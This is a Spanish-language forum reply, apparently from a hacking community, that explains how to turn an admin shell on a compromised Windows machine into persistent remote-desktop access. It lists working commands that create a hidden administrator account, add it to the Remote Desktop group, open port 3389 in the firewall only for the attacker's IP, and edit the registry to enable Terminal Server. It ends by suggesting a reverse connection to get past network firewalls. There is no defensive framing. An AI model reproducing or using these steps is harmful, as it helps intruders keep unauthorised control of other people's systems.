bueno, vas en el buen camino, vamos a suponer que has conseguido una shell con privilegios de admin, los pasos que más o menos debes seguir para conseguir acceso a escritorio remoto:
Primero , vamos a crearnos un usuario (ANTiSPY:ANTiSPY) y lo vamos a meter en el grupo "Administradores" y "Usuarios de escritorio remoto", para que podamos entrar por RDP y desde ahí tener todos los privilegios que podamos necesitar sobre la máquina
>net user ANTiSPY ANTiSPY /add
>net localgroup Administradores ANTiSPY /add
>net localgroup "Usuarios de escritorio remoto" ANTiSPY /add
Ahora, es posible que tengamos filtrado el puerto de Terminal Server (3389/TCP), para comprobarlo bastará con un simple escaneo con NMap...
Si es así, vamos a tener que desactivar el firewall, o mejor aún, crear una excepción para nuestra IP de origen, así sólo nosotros tendremos acceso al Terminal Server y nadie más podrá aprovechar nuestro trabajo para entrar en la máquina:
>netsh firewall add portopening protocol = TCP port = 3389 name = RDP mode = ENABLE scope = CUSTOM addresses = xx.xx.xx.xx
Si ahora hacemos un nuevo escaneo, veremos que...el puerto ha pasado de filtrado a cerrado, eso quiere decir que el firewall ha sido desactivado correctamente, aunque seguimos sin poder conectar porque no hay un servicio a la escucha. Esto es debido a que hay que modificar una clave de registro (en los Windows XP al menos, supongo que en los Server será parecido, pero no te lo aseguro) para poder activar la administración remota. Hagámoslo:
>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ya solo tenemos que acceder y probar la contraseña que hemos configurado a ver si todo el proceso anterior ha surtido efecto:
Este proceso tiene algunas "pegas", la principal es que puede haber más firewalls en el sistema (firewalls en la red, no en el mismo sistema), la solución sería fácil, hacer una conexión inversa y que sea el Sistema el que se conecte con nosotros...